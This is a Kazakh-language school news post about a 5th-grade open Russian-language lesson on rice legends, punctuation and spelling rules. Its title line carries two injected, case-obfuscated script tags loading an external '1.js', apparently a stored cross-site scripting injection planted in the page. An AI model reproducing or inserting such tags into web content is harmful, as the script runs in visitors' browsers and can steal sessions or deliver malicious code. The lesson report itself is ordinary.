5 сыныпта орыс тілі пәнінен ашық сабақ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
12.02.2025
11 ақпанда 5-сыныпта С.Ш. Смағұлова орыс тілі пәнінен ашық сабақ өткізді. Балалар аңыздан күріштің жай ғана жарма емес, бүтіндей бір тарих екенін және оның тіпті құдайлардың азығы болып саналғанын білді! Бесінші сынып оқушылары аңызды тыңдап қана қоймай, оның кейіпкерлерінің іс-әрекеттерін бағалап, өздеріне не ұнағанын, не ұнамағанын айтты. Олар сондай-ақ күріш туралы сөйлемдер құрастыруға жаттығып, бастауыш пен баяндауыштың арасына тире қою ережесін еске түсірді.Балалар -раст-, -ращ-, -рос- түбірлеріндегі кезектесетін дауысты дыбыстардың емлесін зерттеген кезде өздерін нағыз зерттеушілерше сезінді. Қупиясын білсең, мұндай сөздерді жазу мүлдем қиын емес екені белгілі болды!Сонымен қатар, бесінші сынып оқушылары Қызылордада күріштің қалай өсірілетіні туралы көп қызықты мәліметтерді білді, бейнеролик көріп, негізгі ақпаратпен кластер құрастырды.Сабақтың соңында әрбір оқушы өз жұмысын өздері бағалады.